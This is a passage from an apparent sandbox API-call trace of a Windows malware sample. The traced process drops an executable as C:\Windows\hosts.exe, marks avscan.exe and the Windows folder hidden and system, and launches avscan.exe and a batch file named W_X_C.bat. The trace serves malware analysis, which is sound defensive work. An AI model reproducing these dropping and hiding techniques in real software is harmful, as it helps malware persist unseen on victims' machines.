hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x144254c [0098.769] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.227] IMalloc:Alloc (This=0x76da66bc, cb=0x2884a84) returned 0x6f70020 [0101.545] ReadFile (in: hFile=0x210, lpBuffer=0x6f70020, nNumberOfBytesToRead=0x1442542, lpNumberOfBytesRead=0x28f560, lpOverlapped=0x0 | out: lpBuffer=0x6f70020*, lpNumberOfBytesRead=0x28f560*=0x1442542, lpOverlapped=0x0) returned 1 [0102.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="MZ\x90", cbMultiByte=21243202, lpWideCharStr=0x46e0024, cchWideChar=21243202 | out: lpWideCharStr="MZ\x90") returned 21243202 [0102.878] IMalloc:Free (This=0x76da66bc, pv=0x6f70020) [0103.197] CloseHandle (hObject=0x210) returned 1 [0103.197] IMalloc:Free (This=0x76da66bc, pv=0xe71588) [0103.197] GetLocalTime (in: lpSystemTime=0x28f5dc | out: lpSystemTime=0x28f5dc*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x18, wMilliseconds=0xbc)) [0103.197] VarDateFromUdate (in: pudateIn=0x28f600, dwFlags=0x0, pdateOut=0x28f5dc | out: pdateOut=0x28f5dc) returned 0x0 [0103.198] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\hosts.exe", cchWideChar=-1, lpMultiByteStr=0x28f3d0, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\hosts.exe", lpUsedDefaultChar=0x0) returned 21 [0103.198] GetFullPathNameA (in: lpFileName="C:\\Windows\\hosts.exe", nBufferLength=0x104, lpBuffer=0x28f500, lpFilePart=0x28f3c8 | out: lpBuffer="C:\\Windows\\hosts.exe", lpFilePart=0x28f3c8*="hosts.exe") returned 0x14 [0103.198] CreateFileA (lpFileName="C:\\Windows\\hosts.exe" (normalized: "c:\\windows\\hosts.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x28f4c0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0103.199] GetFileType (hFile=0x210) returned 0x1 [0103.199] IMalloc:Alloc (This=0x76da66bc, cb=0x51) returned 0xe5c658 [0103.199] IMalloc:Alloc (This=0x76da66bc, cb=0x2884a84) returned 0x6f70020 [0103.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MZ\x90", cchWideChar=21243202, lpMultiByteStr=0x6f70020, cbMultiByte=42486404, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MZ\x90", lpUsedDefaultChar=0x0) returned 21243202 [0103.642] WriteFile (in: hFile=0x210, lpBuffer=0x6f70020*, nNumberOfBytesToWrite=0x1442542, lpNumberOfBytesWritten=0x28f158, lpOverlapped=0x0 | out: lpBuffer=0x6f70020*, lpNumberOfBytesWritten=0x28f158*=0x1442542, lpOverlapped=0x0) returned 1 [0104.633] IMalloc:Free (This=0x76da66bc, pv=0x6f70020) [0104.809] IMalloc:Alloc (This=0x76da66bc, cb=0x2a) returned 0xe3b938 [0104.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="4/27/2024 11:26:44 AM", cchWideChar=21, lpMultiByteStr=0xe3b938, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="4/27/2024 11:26:44 AM", lpUsedDefaultChar=0x0) returned 21 [0104.809] WriteFile (in: hFile=0x210, lpBuffer=0xe3b938*, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x28f158, lpOverlapped=0x0 | out: lpBuffer=0xe3b938*, lpNumberOfBytesWritten=0x28f158*=0x15, lpOverlapped=0x0) returned 1 [0104.810] IMalloc:Free (This=0x76da66bc, pv=0xe3b938) [0104.810] CloseHandle (hObject=0x210) returned 1 [0105.695] IMalloc:Free (This=0x76da66bc, pv=0xe5c658) [0106.500] FileSystemObject:IDispatch:Invoke (in: This=0x1072c3c, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f6c0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f908, pExcepInfo=0x28f6a0, puArgErr=0x28f6d0 | out: pDispParams=0x28f6c0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f908*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), varVal2=0x0), pExcepInfo=0x28f6a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f6d0*=0x20) returned 0x0 [0106.503] VarCat (in: pvarLeft=0x28f908, pvarRight=0x28f9bc, pvarResult=0x28f8f8 | out: pvarResult=0x28f8f8) returned 0x0 [0106.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", cchWideChar=-1, lpMultiByteStr=0x28f4c0, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", lpUsedDefaultChar=0x0) returned 48 [0106.504] GetFullPathNameA (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", nBufferLength=0x104, lpBuffer=0x28f5f4, lpFilePart=0x28f4b8 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", lpFilePart=0x28f4b8*="avscan.exe") returned 0x2f [0106.504] SetFileAttributesA (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", dwFileAttributes=0x6) returned 1 [0106.505] FileSystemObject:IDispatch:Invoke (in: This=0x1072cec, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f6c0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f908, pExcepInfo=0x28f6a0, puArgErr=0x28f6d0 | out: pDispParams=0x28f6c0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f908*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows" (normalized: "c:\\windows"), varVal2=0x0), pExcepInfo=0x28f6a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f6d0*=0x70) returned 0x0 [0106.506] VarCat (in: pvarLeft=0x28f908, pvarRight=0x28f99c, pvarResult=0x28f8f8 | out: pvarResult=0x28f8f8) returned 0x0 [0106.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x28f4c0, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows", lpUsedDefaultChar=0x0) returned 11 [0106.506] GetFullPathNameA (in: lpFileName="C:\\Windows", nBufferLength=0x104, lpBuffer=0x28f5f4, lpFilePart=0x28f4b8 | out: lpBuffer="C:\\Windows", lpFilePart=0x28f4b8*="Windows") returned 0xa [0106.506] SetFileAttributesA (lpFileName="C:\\Windows", dwFileAttributes=0x6) returned 1 [0106.506] FileSystemObject:IDispatch:Invoke (in: This=0x1072c3c, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f6c0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f908, pExcepInfo=0x28f6a0, puArgErr=0x28f6d0 | out: pDispParams=0x28f6c0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f908*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), varVal2=0x0), pExcepInfo=0x28f6a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f6d0*=0x20) returned 0x0 [0106.507] VarCat (in: pvarLeft=0x28f908, pvarRight=0x28f9bc, pvarResult=0x28f8f8 | out: pvarResult=0x28f8f8) returned 0x0 [0106.507] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x28f6a8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28f6ec | out: lpCommandLine="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", lpProcessInformation=0x28f6ec*(hProcess=0x224, hThread=0x210, dwProcessId=0xfd4, dwThreadId=0xfd8)) returned 1 [0106.584] GetLastError () returned 0x715 [0106.584] WaitForInputIdle (hProcess=0x224, dwMilliseconds=0x2710) returned 0x102 [0132.767] CloseHandle (hObject=0x210) returned 1 [0132.767] CloseHandle (hObject=0x224) returned 1 [0132.767] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="c:\\windows\\W_X_C.bat", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x28f6a8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28f6ec | out: lpCommandLine="c:\\windows\\W_X_C.bat", lpProcessInformation=0x28f6ec*(hProcess=0x210, hThread=0x224, dwProcessId=0xfe0, dwThreadId=0xfe4)) returned 1 [0133.130] GetLastError () returned 0x0 [0133.130] WaitForInputIdle (hProcess=0x210, dwMilliseconds=0x2710) returned 0xffffffff [0133.130] CloseHandle (hObject=0x224) returned 1 [0133.130] CloseHandle (hObject=0x210) returned 1 [0133.130] FileSystemObject:IUnknown:Release (This=0x1072be0) returned 0x0 [0133.131] FileSystemObject:IUnknown:Release (This=0x1072cec) returned 0x0 [0133.131] FileSystemObject:IUnknown:Release (This=0x1072c3c) returned 0x0 [0133.133] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310b140 | out: hHeap=0x30f0000) returned 1 [0133.133] GetCurrentThreadId () returned 0xf38 [0133.134] GetCurrentThreadId () returned 0xf38 [0133.134] GetCurrentThreadId () returned 0xf38 [0133.134] CoDisconnectObject (pUnk=0xe4d9e8, dwReserved=0x0) returned 0x0 [0133.134] IUnknown:QueryInterface (in: This=0xe4d9e8, riid=0x76ca3e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28f9a0 | out: ppvObject=0x28f9a0*=0x0) returned 0x80004002 [0133.135] IUnknown:QueryInterface (in: This=0xe4d9e8, riid=0x76ca9b0c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28f9b0 | out: ppvObject=0x28f9b0*=0xe4da04) returned 0x0 [0133.135] IUnknown:Release (This=0xe4da04) returned 0x2 [0133.135] GetCurrentThreadId () returned 0xf38 [0133.135] GetCurrentThreadId () returned 0xf38 [0133.287] PostMessageA (hWnd=0x6006a, Msg=0x0, wParam=0x0, lParam=0x0) returned 1 [0133.287] GetCurrentThreadId () returned 0xf38 [0133.287] PostMessageA (hWnd=0x6006a, Msg=0x0, wParam=0x0, lParam=0x0) returned 1 [0133.288] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x18) returned 0x31028b8 [0133.288] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31028b8 | out: hHeap=0x30f0000) returned 1 [0133.288] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x18) returned 0x31028b8 [0133.288] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31028b8 | out: hHeap=0x30f0000) returned 1 [0133.288] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x18) returned 0x31028b8 [0133.288] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31028b8 | out: hHeap=0x30f0000) returned 1 [0133.288] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x18) returned 0x31028b8 [0133.288] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31028b8 | out: hHeap=0x30f0000) returned 1 [0133.288] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x18) returned 0x31028b8 [0133.288] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31028b8 | out: hHeap=0x30f0000) returned 1 [0133.288] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x18) returned 0x31028b8 [0133.288] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31028b8 | out: hHeap=0x30f0000) returned 1 [0133.288] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x18) returned 0x31028b8 [0133.288] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31028b8 | out: hHeap=0x30f0000) returned 1 [0133.288] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x18) returned 0x31028b8 [0133.288] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31028b8 | out: hHeap=0x30f0000) returned 1 [0133.289] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x18) returned 0x31028b8 [0133.289] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31028b8 | out: hHeap=0x30f0000) returned 1 [0133.289] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x18) returned 0x31028b8 [0133.289] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31028b8 | out: hHeap=0x30f0000) returned 1 [0133.289] IUnknown:Release (This=0xe3b778) returned 0x0 [0133.289] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310aa38 | out: hHeap=0x30f0000) returned 1 [0133.289] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310a928 | out: hHeap=0x30f0000) returned 1 [0133.289] IMalloc:Free (This=0x76da66bc, pv=0xe4d9e8) [0133.458] FreeLibrary (hLibModule=0x75a80000) returned 1 [0133.459] FreeLibrary (hLibModule=0x75980000) returned 1 [0133.459] FreeLibrary (hLibModule=0x75980000) returned 1 [0133.460] GetCurrentThreadId () returned 0xf38 [0133.460] SendMessageA (hWnd=0x6006a, Msg=0x1061, wParam=0x0, lParam=0x0) returned 0x0 [0133.460] GetCurrentThreadId () returned 0xf38 [0133.460] NtdllDefWindowProc_A (hWnd=0x6006a, Msg=0x1061, wParam=0x0, lParam=0x0) returned 0x0 [0133.460] SendMessageA (hWnd=0x6006a, Msg=0x1050, wParam=0x0, lParam=0x0) returned 0x0 [0133.460] GetCurrentThreadId () returned 0xf38 [0133.461] GetCurrentThreadId () returned 0xf38 [0133.461] GetCurrentThreadId () returned 0xf38 [0133.461] GetCurrentThreadId () returned 0xf38 [0133.461] GetCurrentThreadId () returned 0xf38 [0133.461] GetCurrentThreadId () returned 0xf38 [0133.461] GetCurrentThreadId () returned 0xf38 [0133.462] lstrcpyA (in: lpString1=0x28f9f0, lpString2="" | out: lpString1="") returned="" [0133.462] lstrlenA (lpString="") returned 0 [0133.462] lstrcpyA (in: lpString1=0x28f7e8, lpString2="" | out: lpString1="") returned="" [0133.462] lstrcpynA (in: lpString1=0x28f3c0, lpString2="", iMaxLength=260 | out: lpString1="") returned="" [0133.462] lstrlenA (lpString="") returned 0 [0133.462] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x1) returned 0x310a928 [0133.462] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x1) returned 0x310a938 [0133.462] lstrcpyA (in: lpString1=0x310a928, lpString2="" | out: lpString1="") returned="" [0133.462] lstrlenA (lpString="") returned 0 [0133.462] lstrlenA (lpString=".HLP") returned 4 [0133.462] lstrcpyA (in: lpString1=0x28f4dc, lpString2="" | out: lpString1="") returned="" [0133.462] lstrcatA (in: lpString1="", lpString2=".HLP" | out: lpString1=".HLP") returned=".HLP" [0133.462] lstrcpynA (in: lpString1=0x28f2a0, lpString2=".HLP", iMaxLength=260 | out: lpString1=".HLP") returned=".HLP" [0133.462] lstrlenA (lpString=".HLP") returned 4 [0133.462] RtlReAllocateHeap (Heap=0x30f0000, Flags=0x0, Ptr=0x310a928, Size=0x5) returned 0x310a928 [0133.462] RtlReAllocateHeap (Heap=0x30f0000, Flags=0x0, Ptr=0x310a938, Size=0x5) returned 0x310a938 [0133.462] lstrcpyA (in: lpString1=0x310a928, lpString2=".HLP" | out: lpString1=".HLP") returned=".HLP" [0133.463] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f390 | out: phkResult=0x28f390*=0x170) returned 0x0 [0133.463] RegOpenKeyExA (in: hKey=0x170, lpSubKey="HTML Help", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f394 | out: phkResult=0x28f394*=0x16c) returned 0x0 [0133.463] RegQueryValueExA (in: hKey=0x16c, lpValueName=".HLP", lpReserved=0x0, lpType=0x0, lpData=0x310a948, lpcbData=0x28f38c*=0x104 | out: lpType=0x0, lpData=0x310a948*=0xd0, lpcbData=0x28f38c*=0x104) returned 0x2 [0133.463] RegCloseKey (hKey=0x16c) returned 0x0 [0133.617] RegCloseKey (hKey=0x170) returned 0x0 [0133.617] GetPrivateProfileStringA (in: lpAppName="FILES", lpKeyName=".HLP", lpDefault="", lpReturnedString=0x310a948, nSize=0x104, lpFileName="WINHELP.INI" | out: lpReturnedString="") returned 0x0 [0133.618] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310a948 | out: hHeap=0x30f0000) returned 1 [0133.618] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310aa58 | out: hHeap=0x30f0000) returned 1 [0133.618] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x105) returned 0x310a948 [0133.618] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x5) returned 0x310aa58 [0133.618] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f390 | out: phkResult=0x28f390*=0x170) returned 0x0 [0133.618] RegOpenKeyExA (in: hKey=0x170, lpSubKey="Help", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f394 | out: phkResult=0x28f394*=0x0) returned 0x2 [0133.619] RegCloseKey (hKey=0x170) returned 0x0 [0133.619] GetPrivateProfileStringA (in: lpAppName="FILES", lpKeyName=".HLP", lpDefault="", lpReturnedString=0x310a948, nSize=0x104, lpFileName="WINHELP.INI" | out: lpReturnedString="") returned 0x0 [0133.619] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310a948 | out: hHeap=0x30f0000) returned 1 [0133.619] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310aa58 | out: hHeap=0x30f0000) returned 1 [0133.619] lstrcpynA (in: lpString1=0x28f294, lpString2="C:\\Windows\\system32", iMaxLength=260 | out: lpString1="C:\\Windows\\system32") returned="C:\\Windows\\system32" [0133.619] lstrlenA (lpString="C:\\Windows\\system32") returned 19 [0133.619] RtlReAllocateHeap (Heap=0x30f0000, Flags=0x0, Ptr=0x310a928, Size=0x14) returned 0x310a948 [0133.619] lstrlenA (lpString="C:\\Windows\\system32") returned 19 [0133.619] RtlReAllocateHeap (Heap=0x30f0000, Flags=0x0, Ptr=0x310a938, Size=0x14) returned 0x310a968 [0133.619] lstrcpyA (in: lpString1=0x310a948, lpString2="C:\\Windows\\system32" | out: lpString1="C:\\Windows\\system32") returned="C:\\Windows\\system32" [0133.619] lstrcpynA (in: lpString1=0x28f29c, lpString2=".HLP", iMaxLength=260 | out: lpString1=".HLP") returned=".HLP" [0133.620] lstrlenA (lpString=".HLP") returned 4 [0133.620] lstrlenA (lpString="C:\\Windows\\system32") returned 19 [0133.620] RtlReAllocateHeap (Heap=0x30f0000, Flags=0x0, Ptr=0x310a948, Size=0x19) returned 0x310a988 [0133.620] lstrlenA (lpString="C:\\Windows\\system32") returned 19 [0133.620] RtlReAllocateHeap (Heap=0x30f0000, Flags=0x0, Ptr=0x310a968, Size=0x19) returned 0x310a928 [0133.620] lstrcatA (in: lpString1="C:\\Windows\\system32", lpString2="\\" | out: lpString1="C:\\Windows\\system32\\") returned="C:\\Windows\\system32\\" [0133.620] lstrcatA (in: lpString1="C:\\Windows\\system32\\", lpString2=".HLP" | out: lpString1="C:\\Windows\\system32\\.HLP") returned="C:\\Windows\\system32\\.HLP" [0133.620] lstrlenA (lpString="C:\\Windows\\system32\\.HLP") returned 24 [0133.620] CharToOemBuffA (in: lpszSrc="C:\\Windows\\system32\\.HLP", lpszDst=0x28f2a0, cchDstLength=0x19 | out: lpszDst="C:\\Windows\\system32\\.HLP") returned 1 [0133.620] GetFileAttributesA (lpFileName="C:\\Windows\\system32\\.HLP" (normalized: "c:\\windows\\syswow64\\.hlp")) returned 0xffffffff [0133.620] GetLastError () returned 0x2 [0133.620] GetLastError () returned 0x2 [0133.620] SetLastError (dwErrCode=0x2) [0133.620] GetLastError () returned 0x2 [0133.621] SetLastError (dwErrCode=0x2) [0133.621] GetFileAttributesA (lpFileName="C:\\Windows\\system32\\.HLP" (normalized: "c:\\windows\\syswow64\\.hlp")) returned 0xffffffff [0133.621] GetLastError () returned 0x2 [0133.621] GetLastError () returned 0x2 [0133.621] SetLastError (dwErrCode=0x2) [0133.621] GetLastError () returned 0x2 [0133.621] SetLastError (dwErrCode=0x2) [0133.621] GetWindowsDirectoryA (in: lpBuffer=0x28f3bc, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0133.621] lstrlenA (lpString="C:\\Windows") returned 10 [0133.621] lstrlenA (lpString="C:\\Windows") returned 10 [0133.621] lstrlenA (lpString="C:\\Windows\\") returned 11 [0133.621] lstrcpynA (in: lpString1=0x28f2a0, lpString2="C:\\Windows\\Help", iMaxLength=260 | out: lpString1="C:\\Windows\\Help") returned="C:\\Windows\\Help" [0133.621] lstrlenA (lpString="C:\\Windows\\Help") returned 15 [0133.621] RtlReAllocateHeap (Heap=0x30f0000, Flags=0x0, Ptr=0x310a988, Size=0x10) returned 0x310a988 [0133.621] lstrlenA (lpString="C:\\Windows\\Help") returned 15 [0133.622] RtlReAllocateHeap (Heap=0x30f0000, Flags=0x0, Ptr=0x310a928, Size=0x10) returned 0x310a928 [0133.622] lstrcpyA (in: lpString1=0x310a988, lpString2="C:\\Windows\\Help" | out: lpString1="C:\\Windows\\Help") returned="C:\\Windows\\Help" [0133.622] lstrcpynA (in: lpString1=0x28f29c, lpString2=".HLP", iMaxLength=260 | out: lpString1=".HLP") returned=".HLP" [0133.622] lstrlenA (lpString=".HLP") returned 4 [0133.622] lstrlenA (lpString="C:\\Windows\\Help") returned 15 [0133.622] RtlReAllocateHeap (Heap=0x30f0000, Flags=0x0, Ptr=0x310a988, Size=0x15) returned 0x310a988 [0133.622] lstrlenA (lpString="C:\\Windows\\Help") returned 15 [0133.622] RtlReAllocateHeap (Heap=0x30f0000, Flags=0x0, Ptr=0x310a928, Size=0x15) returned 0x310a928 [0133.622] lstrcatA (in: lpString1="C:\\Windows\\Help", lpString2="\\" | out: lpString1="C:\\Windows\\Help\\") returned="C:\\Windows\\Help\\" [0133.622] lstrcatA (in: lpString1="C:\\Windows\\Help\\", lpString2=".HLP" | out: lpString1="C:\\Windows\\Help\\.HLP") returned="C:\\Windows\\Help\\.HLP" [0133.622] lstrlenA (lpString="C:\\Windows\\Help\\.HLP") returned 20 [0133.622] CharToOemBuffA (in: lpszSrc="C:\\Windows\\Help\\.HLP", lpszDst=0x28f2a0, cchDstLength=0x15 | out: lpszDst="C:\\Windows\\Help\\.HLP") returned 1 [0133.622] GetFileAttributesA (lpFileName="C:\\Windows\\Help\\.HLP" (normalized: "c:\\windows\\help\\.hlp")) returned 0xffffffff [0133.717] GetLastError () returned 0x2 [0133.717] GetLastError () returned 0x2 [0133.717] SetLastError (dwErrCode=0x2) [0133.717] GetLastError () returned 0x2 [0133.717] SetLastError (dwErrCode=0x2) [0133.717] GetFileAttributesA (lpFileName="C:\\Windows\\Help\\.HLP" (normalized: "c:\\windows\\help\\.hlp")) returned 0xffffffff [0133.718] GetLastError () returned 0x2 [0133.718] GetLastError () returned 0x2 [0133.718] SetLastError (dwErrCode=0x2) [0133.718] GetLastError () returned 0x2 [0133.718] SetLastError (dwErrCode=0x2) [0133.718] lstrlenA (lpString="") returned 0 [0133.718] lstrcpyA (in: lpString1=0x28f2b0, lpString2="" | out: lpString1="") returned="" [0133.718] lstrlenA (lpString=".HLP") returned 4 [0133.718] lstrlenA (lpString="") returned 0 [0133.718] lstrcpynA (in: lpString1=0x28f3c0, lpString2="", iMaxLength=260 | out: lpString1="") returned="" [0133.718] lstrlenA (lpString="") returned 0 [0133.718] RtlReAllocateHeap (Heap=0x30f0000, Flags=0x0, Ptr=0x310a988, Size=0x1) returned 0x310a988 [0133.718] RtlReAllocateHeap (Heap=0x30f0000, Flags=0x0, Ptr=0x310a928, Size=0x1) returned 0x310a928 [0133.718] lstrcpyA (in: lpString1=0x310a988, lpString2="" | out: lpString1="") returned="" [0133.718] lstrcpyA (in: lpString1=0x28f9f0, lpString2="" | out: lpString1="") returned="" [0133.719] lstrlenA (lpString="") returned 0 [0133.719] lstrlenA (lpString="") returned 0 [0133.719] lstrcatA (in: lpString1="", lpString2="" | out: lpString1="") returned="" [0133.719] GetDesktopWindow () returned 0x10010 [0133.719] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310a928 | out: hHeap=0x30f0000) returned 1 [0133.719] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310a988 | out: hHeap=0x30f0000) returned 1 [0133.719] CoFreeUnusedLibraries () [0133.724] GetCurrentThreadId () returned 0xf38 [0133.724] DestroyWindow (hWnd=0x6006a) returned 1 [0133.725] NtdllDefWindowProc_A (hWnd=0x6006a, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0133.725] NtdllDefWindowProc_A (hWnd=0x6006a, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0133.725] NtdllDefWindowProc_A (hWnd=0x50066, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0133.726] NtdllDefWindowProc_A (hWnd=0x50066, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0133.727] PostQuitMessage (nExitCode=0) [0133.727] NtdllDefWindowProc_A (hWnd=0x6006a, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0133.727] NtdllDefWindowProc_A (hWnd=0x6006a, Msg=0x1050, wParam=0x0, lParam=0x0) returned 0x0 [0133.727] GetCurrentThreadId () returned 0xf38 [0133.727] GetCurrentThreadId () returned 0xf38 